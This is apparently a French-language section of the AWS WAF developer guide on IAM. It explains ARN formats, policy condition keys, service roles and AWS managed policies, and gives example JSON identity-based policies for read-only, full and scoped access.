+ *scope*: définissez le champ d'application `global` pour une utilisation avec une CloudFront distribution Amazon ou `regional` pour une utilisation avec l'une des ressources régionales prises AWS WAF en charge. Les ressources régionales sont une API REST Amazon API Gateway, un Application Load Balancer, une API AWS AppSync GraphQL, un groupe d'utilisateurs Amazon Cognito, un AWS App Runner service et une instance Verified Access. AWS 
+ *resource-type*: Spécifiez l'une des valeurs suivantes : `webacl``rulegroup`,`ipset`,`regexpatternset`, ou`managedruleset`.
+ *resource-name*: Spécifiez le nom que vous avez donné à la AWS WAF ressource ou spécifiez un caractère générique (`*`) pour indiquer toutes les ressources qui répondent aux autres spécifications de l'ARN. Vous devez soit spécifier le nom et l'ID de la ressource, soit spécifier un caractère générique pour les deux. 
+ *resource-id*: Spécifiez l'ID de la AWS WAF ressource ou spécifiez un caractère générique (`*`) pour indiquer toutes les ressources qui répondent aux autres spécifications de l'ARN. Vous devez soit spécifier le nom et l'ID de la ressource, soit spécifier un caractère générique pour les deux.

Par exemple, l'ARN suivant spécifie tous les packs de protection (Web ACLs) ayant une portée régionale pour le compte `111122223333` dans Region `us-west-1` :

```
arn:aws:wafv2:us-west-1:111122223333:regional/webacl/*/*
```

L'ARN suivant spécifie le groupe de règles nommé `MyIPManagementRuleGroup` avec une portée globale pour le compte `111122223333` dans Region `us-east-1` :

```
arn:aws:wafv2:us-east-1:111122223333:global/rulegroup/MyIPManagementRuleGroup/1111aaaa-bbbb-cccc-dddd-example-id
```

Pour consulter des exemples de politiques AWS WAF basées sur l'identité, consultez. [Exemples de politiques basées sur l'identité pour AWS WAF](security_iam_id-based-policy-examples.md)

## Clés de conditions de politique pour AWS WAF
<a name="security_iam_service-with-iam-id-based-policies-conditionkeys"></a>

**Prend en charge les clés de condition de politique spécifiques au service :** oui

Les administrateurs peuvent utiliser les politiques AWS JSON pour spécifier qui a accès à quoi. C’est-à-dire, quel **principal** peut effectuer **des actions** sur quelles **ressources** et dans quelles **conditions**.

L’élément `Condition` indique à quel moment les instructions s’exécutent en fonction de critères définis. Vous pouvez créer des expressions conditionnelles qui utilisent des [opérateurs de condition](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_condition_operators.html), tels que les signes égal ou inférieur à, pour faire correspondre la condition de la politique aux valeurs de la demande. Pour voir toutes les clés de condition AWS globales, voir les clés de [contexte de condition AWS globales](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html) dans le *guide de l'utilisateur IAM*.

En outre, AWS WAF prend en charge les clés de condition suivantes que vous pouvez utiliser pour filtrer avec précision vos politiques IAM :
+ **wafv2 : LogDestinationResource**

  Cette clé de condition utilise une spécification Amazon Resource Name (ARN) pour la destination de journalisation. Il s'agit de l'ARN que vous fournissez pour la destination de journalisation lorsque vous utilisez l'appel d'API REST`PutLoggingConfiguration`. 

  Vous pouvez spécifier un ARN de manière explicite et vous pouvez spécifier le filtrage de l'ARN. L'exemple suivant indique le filtrage pour les compartiments Amazon S3 dotés ARNs d'un emplacement et d'un préfixe spécifiques. 

  ```
  "Condition": { "ArnLike": { "wafv2:LogDestinationResource": "arn:aws:s3:::aws-waf-logs-suffix/custom-prefix/*" } }
  ```
+ **wafv2 : LogScope**

  Cette clé de condition définit la source de la configuration de journalisation dans une chaîne. Actuellement, ce paramètre est toujours défini sur la valeur par défaut de`Customer`, ce qui indique que vous détenez et gérez la destination de journalisation. 

Pour voir la liste des clés de AWS WAF condition, voir Clés de [condition pour la AWS WAF V2](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html#awswafv2-policy-keys) dans la *référence d'autorisation de service*. Pour savoir avec quelles actions et ressources vous pouvez utiliser une clé de condition, voir [Actions définies par la AWS WAF version 2](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html#awswafv2-actions-as-permissions).

Pour consulter des exemples de politiques AWS WAF basées sur l'identité, consultez. [Exemples de politiques basées sur l'identité pour AWS WAF](security_iam_id-based-policy-examples.md)

## ACLs in AWS WAF
<a name="security_iam_service-with-iam-acls"></a>

**Supports ACLs :** Non 

Les listes de contrôle d'accès (ACLs) contrôlent les principaux (membres du compte, utilisateurs ou rôles) autorisés à accéder à une ressource. ACLs sont similaires aux politiques basées sur les ressources, bien qu'elles n'utilisent pas le format de document de politique JSON.

## ABAC avec AWS WAF
<a name="security_iam_service-with-iam-tags"></a>

**Prend en charge ABAC (identifications dans les politiques) :** partiellement

Le contrôle d’accès par attributs (ABAC) est une stratégie d’autorisation qui définit les autorisations en fonction des attributs nommés balise. Vous pouvez associer des balises aux entités et aux AWS ressources IAM, puis concevoir des politiques ABAC pour autoriser les opérations lorsque la balise du principal correspond à la balise de la ressource.

Pour contrôler l’accès basé sur des étiquettes, vous devez fournir les informations d’étiquette dans l’[élément de condition](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_condition.html) d’une politique utilisant les clés de condition `aws:ResourceTag/key-name`, `aws:RequestTag/key-name` ou `aws:TagKeys`.

Si un service prend en charge les trois clés de condition pour tous les types de ressources, alors la valeur pour ce service est **Oui**. Si un service prend en charge les trois clés de condition pour certains types de ressources uniquement, la valeur est **Partielle**.

Pour plus d’informations sur ABAC, consultez [Définition d’autorisations avec l’autorisation ABAC](https://docs.aws.amazon.com/IAM/latest/UserGuide/introduction_attribute-based-access-control.html) dans le *Guide de l’utilisateur IAM*. Pour accéder à un didacticiel décrivant les étapes de configuration de l’ABAC, consultez [Utilisation du contrôle d’accès par attributs (ABAC)](https://docs.aws.amazon.com/IAM/latest/UserGuide/tutorial_attribute-based-access-control.html) dans le *Guide de l’utilisateur IAM*.

## Utilisation d'informations d'identification temporaires avec AWS WAF
<a name="security_iam_service-with-iam-roles-tempcreds"></a>

**Prend en charge les informations d’identification temporaires :** oui

Les informations d'identification temporaires fournissent un accès à court terme aux AWS ressources et sont automatiquement créées lorsque vous utilisez la fédération ou que vous changez de rôle. AWS recommande de générer dynamiquement des informations d'identification temporaires au lieu d'utiliser des clés d'accès à long terme. Pour plus d’informations, consultez [Informations d’identification de sécurité temporaires dans IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html) et [Services AWS compatibles avec IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_aws-services-that-work-with-iam.html) dans le *Guide de l’utilisateur IAM*.

## Transférer les sessions d'accès pour le service AWS WAF
<a name="security_iam_service-with-iam-principal-permissions"></a>

**Prend en charge les sessions d’accès direct (FAS) :** oui

 Les sessions d'accès direct (FAS) utilisent les autorisations du principal appelant et Service AWS, combinées Service AWS à la demande d'envoi de demandes aux services en aval. Pour plus de détails sur la politique relative à la transmission de demandes FAS, consultez la section [Sessions de transmission d’accès](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_forward_access_sessions.html). 

## Rôles de service pour AWS WAF
<a name="security_iam_service-with-iam-roles-service"></a>

**Prend en charge les rôles de service :** oui

 Un rôle de service est un [rôle IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) qu’un service endosse pour accomplir des actions en votre nom. Un administrateur IAM peut créer, modifier et supprimer un rôle de service à partir d’IAM. Pour plus d’informations, consultez [Création d’un rôle pour la délégation d’autorisations à un Service AWS](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_create_for-service.html) dans le *Guide de l’utilisateur IAM*. 

**Avertissement**  
La modification des autorisations associées à un rôle de service peut perturber AWS WAF les fonctionnalités. Modifiez les rôles de service uniquement lorsque AWS WAF vous recevez des instructions à cet effet.

## Rôles liés à un service pour AWS WAF
<a name="security_iam_service-with-iam-roles-service-linked"></a>

**Prend en charge les rôles liés à un service :** oui

 Un rôle lié à un service est un type de rôle de service lié à un. Service AWS Le service peut endosser le rôle afin d’effectuer une action en votre nom. Les rôles liés à un service apparaissent dans votre Compte AWS répertoire et appartiennent au service. Un administrateur IAM peut consulter, mais ne peut pas modifier, les autorisations concernant les rôles liés à un service. 

Pour plus de détails sur la création ou la gestion des rôles AWS WAF liés à un service, consultez. [Utilisation de rôles liés à un service pour AWS WAF](using-service-linked-roles.md)

# Exemples de politiques basées sur l'identité pour AWS WAF
<a name="security_iam_id-based-policy-examples"></a>

Cette section fournit des exemples de politiques basées sur l'identité pour. AWS WAF

Par défaut, les utilisateurs et les rôles ne sont pas autorisés à créer ou modifier les ressources AWS WAF . Pour octroyer aux utilisateurs des autorisations d’effectuer des actions sur les ressources dont ils ont besoin, un administrateur IAM peut créer des politiques IAM.

Pour apprendre à créer une politique basée sur l’identité IAM à l’aide de ces exemples de documents de politique JSON, consultez [Création de politiques IAM (console)](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_create-console.html) dans le *Guide de l’utilisateur IAM*.

Pour plus de détails sur les actions et les types de ressources définis par AWS WAF, y compris le format de ARNs pour chacun des types de ressources, voir [Actions, ressources et clés de condition pour la AWS WAF V2](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html) dans la *référence d'autorisation de service*.

**Topics**
+ [Bonnes pratiques en matière de politiques](#security_iam_service-with-iam-policy-best-practices)
+ [Utilisation de la AWS WAF console](#security_iam_id-based-policy-examples-console)
+ [Autorisation accordée aux utilisateurs pour afficher leurs propres autorisations](#security_iam_id-based-policy-examples-view-own-permissions)
+ [Accordez un accès en lecture seule à AWS WAF, et CloudFront CloudWatch](#security_iam_id-based-policy-examples-read-only1)
+ [Accordez un accès complet à AWS WAF CloudFront, et CloudWatch](#security_iam_id-based-policy-examples-full-access1)
+ [Accorder l'accès à un single Compte AWS](#security_iam_id-based-policy-examples-access-to-account)
+ [Accorder l'accès à un pack de protection unique (ACL Web)](#security_iam_id-based-policy-examples-access-to-web-acl)
+ [Accorder l'accès par CLI à un pack de protection (ACL Web) et à un groupe de règles](#security_iam_id-based-policy-examples-cli-access-to-web-acl)

## Bonnes pratiques en matière de politiques
<a name="security_iam_service-with-iam-policy-best-practices"></a>

Les politiques basées sur l'identité déterminent si quelqu'un peut créer, accéder ou supprimer AWS WAF des ressources dans votre compte. Ces actions peuvent entraîner des frais pour votre Compte AWS. Lorsque vous créez ou modifiez des politiques basées sur l’identité, suivez ces instructions et recommandations :
+ **Commencez AWS par les politiques gérées et passez aux autorisations du moindre privilège : pour commencer à accorder des autorisations** à vos utilisateurs et à vos charges de travail, utilisez les *politiques AWS gérées* qui accordent des autorisations pour de nombreux cas d'utilisation courants. Ils sont disponibles dans votre Compte AWS. Nous vous recommandons de réduire davantage les autorisations en définissant des politiques gérées par les AWS clients spécifiques à vos cas d'utilisation. Pour plus d’informations, consultez [politiques gérées par AWS](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_managed-vs-inline.html#aws-managed-policies) ou [politiques gérées par AWS pour les activités professionnelles](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_job-functions.html) dans le *Guide de l’utilisateur IAM*.
+ **Accordez les autorisations de moindre privilège** : lorsque vous définissez des autorisations avec des politiques IAM, accordez uniquement les autorisations nécessaires à l’exécution d’une seule tâche. Pour ce faire, vous définissez les actions qui peuvent être entreprises sur des ressources spécifiques dans des conditions spécifiques, également appelées *autorisations de moindre privilège*. Pour plus d’informations sur l’utilisation d’IAM pour appliquer des autorisations, consultez [politiques et autorisations dans IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html) dans le *Guide de l’utilisateur IAM*.
+ **Utilisez des conditions dans les politiques IAM pour restreindre davantage l’accès** : vous pouvez ajouter une condition à vos politiques afin de limiter l’accès aux actions et aux ressources. Par exemple, vous pouvez écrire une condition de politique pour spécifier que toutes les demandes doivent être envoyées via SSL. Vous pouvez également utiliser des conditions pour accorder l'accès aux actions de service si elles sont utilisées par le biais d'un service spécifique Service AWS, tel que CloudFormation. Pour plus d’informations, consultez [Conditions pour éléments de politique JSON IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_condition.html) dans le *Guide de l’utilisateur IAM*.
+ **Utilisez l’Analyseur d’accès IAM pour valider vos politiques IAM afin de garantir des autorisations sécurisées et fonctionnelles** : l’Analyseur d’accès IAM valide les politiques nouvelles et existantes de manière à ce que les politiques IAM respectent le langage de politique IAM (JSON) et les bonnes pratiques IAM. IAM Access Analyzer fournit plus de 100 vérifications de politiques et des recommandations exploitables pour vous aider à créer des politiques sécurisées et fonctionnelles. Pour plus d’informations, consultez [Validation de politiques avec IAM Access Analyzer](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-policy-validation.html) dans le *Guide de l’utilisateur IAM*.
+ **Exiger l'authentification multifactorielle (MFA**) : si vous avez un scénario qui nécessite des utilisateurs IAM ou un utilisateur root, activez l'authentification MFA pour une sécurité accrue. Compte AWS Pour exiger la MFA lorsque des opérations d’API sont appelées, ajoutez des conditions MFA à vos politiques. Pour plus d’informations, consultez [Sécurisation de l’accès aux API avec MFA](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html) dans le *Guide de l’utilisateur IAM*.

Pour plus d’informations sur les bonnes pratiques dans IAM, consultez [Bonnes pratiques de sécurité dans IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html) dans le *Guide de l’utilisateur IAM*.

## Utilisation de la AWS WAF console
<a name="security_iam_id-based-policy-examples-console"></a>

Pour accéder à la AWS WAF console, vous devez disposer d'un ensemble minimal d'autorisations. Ces autorisations doivent vous permettre de répertorier et d'afficher les détails AWS WAF des ressources de votre Compte AWS. Si vous créez une politique basée sur l’identité qui est plus restrictive que l’ensemble minimum d’autorisations requis, la console ne fonctionnera pas comme prévu pour les entités (utilisateurs ou rôles) tributaires de cette politique.

Il n'est pas nécessaire d'accorder des autorisations de console minimales aux utilisateurs qui appellent uniquement l'API AWS CLI ou l' AWS API. Autorisez plutôt l’accès à uniquement aux actions qui correspondent à l’opération d’API qu’ils tentent d’effectuer.

Pour garantir que les utilisateurs et les rôles peuvent utiliser la AWS WAF console, associez également au moins la politique AWS WAF `AWSWAFConsoleReadOnlyAccess` AWS gérée aux entités. Pour plus d'informations sur cette politique gérée, consultez[AWS politique gérée : AWSWAFConsole ReadOnlyAccess](security-iam-awsmanpol.md#security-iam-awsmanpol-AWSWAFConsoleReadOnlyAccess). Pour plus d'informations sur l'attachement d'une politique gérée à un utilisateur, consultez la section [Ajouter des autorisations à un utilisateur](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_change-permissions.html#users_change_permissions-add-console) dans le *guide de l'utilisateur IAM*.

## Autorisation accordée aux utilisateurs pour afficher leurs propres autorisations
<a name="security_iam_id-based-policy-examples-view-own-permissions"></a>

Cet exemple montre comment créer une politique qui permet aux utilisateurs IAM d’afficher les politiques en ligne et gérées attachées à leur identité d’utilisateur. Cette politique inclut les autorisations permettant d'effectuer cette action sur la console ou par programmation à l'aide de l'API AWS CLI or AWS .

```
{
    "Version": "2012-10-17",		 	 	 
    "Statement": [
        {
            "Sid": "ViewOwnUserInfo",
            "Effect": "Allow",
            "Action": [
                "iam:GetUserPolicy",
                "iam:ListGroupsForUser",
                "iam:ListAttachedUserPolicies",
                "iam:ListUserPolicies",
                "iam:GetUser"
            ],
            "Resource": ["arn:aws:iam::*:user/${aws:username}"]
        },
        {
            "Sid": "NavigateInConsole",
            "Effect": "Allow",
            "Action": [
                "iam:GetGroupPolicy",
                "iam:GetPolicyVersion",
                "iam:GetPolicy",
                "iam:ListAttachedGroupPolicies",
                "iam:ListGroupPolicies",
                "iam:ListPolicyVersions",
                "iam:ListPolicies",
                "iam:ListUsers"
            ],
            "Resource": "*"
        }
    ]
}
```

## Accordez un accès en lecture seule à AWS WAF, et CloudFront CloudWatch
<a name="security_iam_id-based-policy-examples-read-only1"></a>

La politique suivante accorde aux utilisateurs un accès en lecture seule aux AWS WAF ressources, aux distributions CloudFront Web Amazon et aux métriques Amazon CloudWatch . Il est utile pour les utilisateurs qui ont besoin d'une autorisation pour consulter les paramètres des AWS WAF conditions, des règles et des packs de protection (Web ACLs) afin de voir quelle distribution est associée à un pack de protection (ACL Web) et de surveiller les métriques et un échantillon de demandes introduites CloudWatch. Ces utilisateurs ne peuvent pas créer, mettre à jour ou supprimer des ressources AWS WAF .

```
 {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Action": [
                "wafv2:Get*",
                "wafv2:List*",
                "cloudfront:GetDistribution",
                "cloudfront:GetDistributionConfig",
                "cloudfront:ListDistributions",
                "cloudfront:ListDistributionsByWebACLId",
                "cloudfront:ListDistributionTenantsByCustomization",
                "cloudfront:ListDistributionTenants",
                "cloudfront:GetDistributionTenant",
                "cloudwatch:GetMetricData",
                "cloudwatch:ListMetrics",
                "cloudwatch:GetMetricStatistics",
                "ec2:DescribeRegions",
                "pricingplanmanager:GetSubscription",
                "pricingplanmanager:ListSubscriptions",
                "route53:ListHostedZones",
                "route53:GetHostedZone"
            ],
            "Effect": "Allow",
            "Resource": "*"
        }
    ]
}
```

## Accordez un accès complet à AWS WAF CloudFront, et CloudWatch
<a name="security_iam_id-based-policy-examples-full-access1"></a>

La politique suivante permet aux utilisateurs d'effectuer n'importe quelle AWS WAF opération, d'effectuer n'importe quelle opération sur les distributions CloudFront Web et de surveiller les métriques et un échantillon de demandes introduites CloudWatch. C'est utile pour les utilisateurs AWS WAF administrateurs.

```
 {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Action": [
                "wafv2:*",
                "cloudfront:CreateDistribution",
                "cloudfront:ListDistributions",
                "cloudfront:ListDistributionsByWebACLId",
                "cloudfront:UpdateDistribution",
                "cloudfront:GetDistributionConfig",
                "cloudfront:GetDistribution",
                "cloudfront:DisassociateDistributionTenantWebACL",
                "cloudfront:DisassociateDistributionWebACL",
                "cloudfront:AssociateDistributionTenantWebACL",
                "cloudfront:AssociateDistributionWebACL",
                "cloudfront:ListDistributionTenantsByCustomization",
                "cloudfront:ListDistributionTenants",
                "cloudfront:DeleteDistribution",
                "cloudfront:GetDistributionTenant",
                "cloudfront:DeleteDistributionTenant",
                "cloudwatch:GetMetricData",
                "cloudwatch:ListMetrics",
                "cloudwatch:GetMetricStatistics",
                "ec2:DescribeRegions",
                "pricingplanmanager:GetSubscription",
                "pricingplanmanager:ListSubscriptions",
                "pricingplanmanager:UpdateSubscription",
                "pricingplanmanager:CancelSubscription",
                "pricingplanmanager:CancelSubscriptionChange",
                "pricingplanmanager:AssociateResourcesToSubscription",
                "pricingplanmanager:DisassociateResourcesFromSubscription",
                "route53:ListHostedZones",
                "route53:GetHostedZone"
            ],
            "Effect": "Allow",
            "Resource": "*"
        }
    ]
}
```

Nous vous recommandons vivement de configurer Multi-Factor Authentication (MFA) pour les utilisateurs qui ont des autorisations d'administration. *Pour plus d'informations, consultez la section [Using Multi-Factor Authentication (MFA) Devices AWS](https://docs.aws.amazon.com/IAM/latest/UserGuide/Using_ManagingMFA.html) with dans le guide de l'utilisateur IAM.* 

## Accorder l'accès à un single Compte AWS
<a name="security_iam_id-based-policy-examples-access-to-account"></a>

Cette politique accorde les autorisations suivantes au compte 444455556666 :
+ Accès complet à toutes les AWS WAF opérations et ressources.
+ Accès en lecture et mise à jour à toutes les CloudFront distributions, ce qui vous permet d'associer des packs de protection (Web ACLs) et CloudFront des distributions.
+ Accès en lecture à toutes les CloudWatch mesures et statistiques des métriques, afin de pouvoir consulter CloudWatch les données et un échantillon de demandes dans la AWS WAF console. 

------
#### [ JSON ]

****  

```
{
   "Version":"2012-10-17",		 	 	 
   "Statement": [
      {
         "Effect": "Allow",
         "Action": [
            "wafv2:*"
         ],
         "Resource": [
            "arn:aws:wafv2:us-east-1:444455556666:*"
         ]
      },
      {
         "Effect": "Allow",
         "Action": [
            "cloudfront:GetDistribution",
            "cloudfront:GetDistributionConfig",
            "cloudfront:ListDistributions",
            "cloudfront:ListDistributionsByWebACLId",
            "cloudfront:UpdateDistribution",
            "cloudwatch:ListMetrics",
            "cloudwatch:GetMetricStatistics",
            "ec2:DescribeRegions"
         ],
         "Resource": [
            "*"
         ]
      }
   ]
}
```

------

## Accorder l'accès à un pack de protection unique (ACL Web)
<a name="security_iam_id-based-policy-examples-access-to-web-acl"></a>

La politique suivante permet aux utilisateurs d'effectuer n'importe quelle AWS WAF opération via la console sur un pack de protection (ACL Web) spécifique du compte`444455556666`.

------
#### [ JSON ]

****  

```
{
    "Version":"2012-10-17",		 	 	 
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "wafv2:*"
            ],
            "Resource": [
                "arn:aws:wafv2:us-east-1:444455556666:regional/webacl/test123/112233d7c-86b2-458b-af83-51c51example"
            ]
        },
        {
            "Sid": "consoleAccess",
            "Effect": "Allow",
            "Action": [
                "wafv2:ListWebACLs",
                "ec2:DescribeRegions"
            ],
            "Resource": [
                "*"
            ]
        }
    ]
}
```

------

## Accorder l'accès par CLI à un pack de protection (ACL Web) et à un groupe de règles
<a name="security_iam_id-based-policy-examples-cli-access-to-web-acl"></a>

La politique suivante permet aux utilisateurs d'effectuer n'importe quelle AWS WAF opération via la CLI sur un pack de protection spécifique (ACL Web) et un groupe de règles spécifique dans le compte`444455556666`.

------
#### [ JSON ]

****  

```
{
   "Version":"2012-10-17",		 	 	 
   "Statement": [
      {
         "Effect": "Allow",
         "Action": [
            "wafv2:*"
         ],
         "Resource": [
        "arn:aws:wafv2:us-east-1:444455556666:regional/webacl/test123/112233d7c-86b2-458b-af83-51c51example",
        "arn:aws:wafv2:us-east-1:444455556666:regional/rulegroup/test123rulegroup/555555555-6666-1234-abcd-00d11example"
         ]
      }
   ]
}
```

------

La politique suivante permet aux utilisateurs d'effectuer n'importe quelle AWS WAF opération via la console sur un pack de protection (ACL Web) spécifique du compte`444455556666`.

------
#### [ JSON ]

****  

```
{
    "Version":"2012-10-17",		 	 	 
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "wafv2:*"
            ],
            "Resource": [
                "arn:aws:wafv2:us-east-1:444455556666:regional/webacl/test123/112233d7c-86b2-458b-af83-51c51example"
            ]
        },
        {
            "Sid": "consoleAccess",
            "Effect": "Allow",
            "Action": [
                "wafv2:ListWebACLs",
                "ec2:DescribeRegions"
            ],
            "Resource": [
                "*"
            ]
        }
    ]
}
```

------

# AWS politiques gérées pour AWS WAF
<a name="security-iam-awsmanpol"></a>

Cette section explique comment utiliser les politiques AWS gérées pour AWS WAF.

Une politique AWS gérée est une politique autonome créée et administrée par AWS. AWS les politiques gérées sont conçues pour fournir des autorisations pour de nombreux cas d'utilisation courants afin que vous puissiez commencer à attribuer des autorisations aux utilisateurs, aux groupes et aux rôles.

N'oubliez pas que les politiques AWS gérées peuvent ne pas accorder d'autorisations de moindre privilège pour vos cas d'utilisation spécifiques, car elles sont accessibles à tous les AWS clients. Nous vous recommandons de réduire encore les autorisations en définissant des [politiques gérées par le client](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_managed-vs-inline.html#customer-managed-policies) qui sont propres à vos cas d’utilisation.

Vous ne pouvez pas modifier les autorisations définies dans les politiques AWS gérées. Si les autorisations définies dans une politique AWS gérée sont AWS mises à jour, la mise à jour affecte toutes les identités principales (utilisateurs, groupes et rôles) auxquelles la politique est attachée. AWS est le plus susceptible de mettre à jour une politique AWS gérée lorsqu'une nouvelle politique Service AWS est lancée ou lorsque de nouvelles opérations d'API sont disponibles pour les services existants.

Pour plus d’informations, consultez [Politiques gérées par AWS](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_managed-vs-inline.html#aws-managed-policies) dans le *Guide de l’utilisateur IAM*.

## AWS politique gérée : AWSWAFRead OnlyAccess
<a name="security-iam-awsmanpol-AWSWAFReadOnlyAccess"></a>

Cette politique accorde des autorisations en lecture seule qui permettent aux utilisateurs d'accéder aux AWS WAF ressources et aux ressources pour des services intégrés, tels qu'Amazon CloudFront, Amazon API Gateway, Application Load Balancer, AWS AppSync Amazon Cognito AWS App Runner AWS Amplify, CloudWatch Amazon et Verified Access. AWS Vous pouvez associer cette politique à vos identités IAM. AWS WAF associe également cette politique à un rôle de service qui permet AWS WAF d'effectuer des actions en votre nom.

Pour plus de détails sur cette politique, consultez [AWSWAFReadOnlyAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFReadOnlyAccess$serviceLevelSummary)la console IAM.

## AWS politique gérée : AWSWAFFull Accès
<a name="security-iam-awsmanpol-AWSWAFFullAccess"></a>

Cette politique accorde un accès complet aux AWS WAF ressources et aux ressources pour les services intégrés, tels qu'Amazon CloudFront, Amazon API Gateway, Application Load Balancer AWS AppSync, Amazon Cognito AWS App Runner AWS Amplify, CloudWatch AWS Amazon et Verified Access. Vous pouvez associer cette politique à vos identités IAM. AWS WAF associe également cette politique à un rôle de service qui permet AWS WAF d'effectuer des actions en votre nom.

Pour plus de détails sur cette politique, consultez la section [AWSWAFFullAccès](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFFullAccess$serviceLevelSummary) dans la console IAM.

## AWS politique gérée : AWSWAFConsole ReadOnlyAccess
<a name="security-iam-awsmanpol-AWSWAFConsoleReadOnlyAccess"></a>

Cette politique accorde des autorisations en lecture seule à la AWS WAF console, qui inclut des ressources pour AWS WAF et pour les services intégrés, tels qu'Amazon CloudFront, Amazon API Gateway, Application Load Balancer, AWS AppSync Amazon Cognito AWS App Runner AWS Amplify, CloudWatch Amazon et Verified Access. AWS Vous pouvez associer cette politique à vos identités IAM.

Pour plus de détails sur cette politique, consultez [AWSWAFConsoleReadOnlyAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFConsoleReadOnlyAccess$serviceLevelSummary)la console IAM.

## AWS politique gérée : AWSWAFConsole FullAccess
<a name="security-iam-awsmanpol-AWSWAFConsoleFullAccess"></a>

Cette politique accorde un accès complet à la AWS WAF console, qui inclut des ressources pour AWS WAF et pour les services intégrés, tels qu'Amazon CloudFront, Amazon API Gateway, Application Load Balancer AWS AppSync, Amazon Cognito AWS App Runner AWS Amplify, CloudWatch AWS Amazon et Verified Access. Vous pouvez associer cette politique à vos identités IAM. AWS WAF associe également cette politique à un rôle de service qui permet AWS WAF d'effectuer des actions en votre nom.

Pour plus de détails sur cette politique, consultez [AWSWAFConsoleFullAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFConsoleFullAccess$serviceLevelSummary)la console IAM.

## AWS politique gérée : WAFV2 LoggingServiceRolePolicy
<a name="security-iam-awsmanpol-WAFV2LoggingServiceRolePolicy"></a>

Cette politique permet d' AWS WAF écrire des journaux sur Amazon Data Firehose. Cette politique n'est utilisée que si vous activez la connexion AWS WAF. Cette politique est attachée au rôle lié à un service `AWSServiceRoleForWAFV2Logging`. Pour de plus amples informations sur le rôle lié à un service, veuillez consulter [Utilisation de rôles liés à un service pour AWS WAF](using-service-linked-roles.md). 

Pour plus de détails sur cette politique, consultez [WAFV2LoggingServiceRolePolicy](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/aws-service-role/WAFV2LoggingServiceRolePolicy$serviceLevelSummary)la console IAM.

## AWS WAF mises à jour des politiques AWS gérées
<a name="security-iam-awsmanpol-updates"></a>



Consultez les détails des mises à jour des politiques AWS gérées AWS WAF depuis que ce service a commencé à suivre ces modifications. Pour recevoir des alertes automatiques concernant les modifications apportées à cette page, abonnez-vous au flux RSS sur la page d'historique du AWS WAF document à l'adresse[Historique du document](doc-history.md).




| Politique | Description du changement | Date | 
| --- | --- | --- | 
|  `AWSWAFConsoleFullAccess` Cette politique permet AWS WAF de gérer les ressources de AWS la console et d'autres AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFConsoleFullAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFConsoleFullAccess$serviceLevelSummary).  |  Les autorisations suivantes ont été ajoutées pour CloudFront les plans tarifaires. Pour plus de détails, voir [Utilisation AWS WAF avec des plans CloudFront de tarification forfaitaires](cloudfront-features.md#waf-cf-pricing-plans) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/security-iam-awsmanpol.html)  | 18/11/2025  | 
|  `AWSWAFConsoleReadOnlyAccess` Cette politique permet AWS WAF de gérer les ressources de AWS la console et d'autres AWS ressources en votre nom dans AWS WAF et dans les services intégrés. Détails dans la console IAM : [AWSWAFConsoleReadOnlyAccess](https://console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSWAFConsoleReadOnlyAccess$serviceLevelSummary).  |  Les autorisations suivantes ont été ajoutées pour CloudFront les plans tarifaires. Pour plus de détails, voir [Utilisation AWS WAF avec des plans CloudFront de tarification forfaitaires](cloudfront-features.md#waf-cf-pricing-plans) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/security-iam-awsmanpol.html)  | 18/11/2025 | 
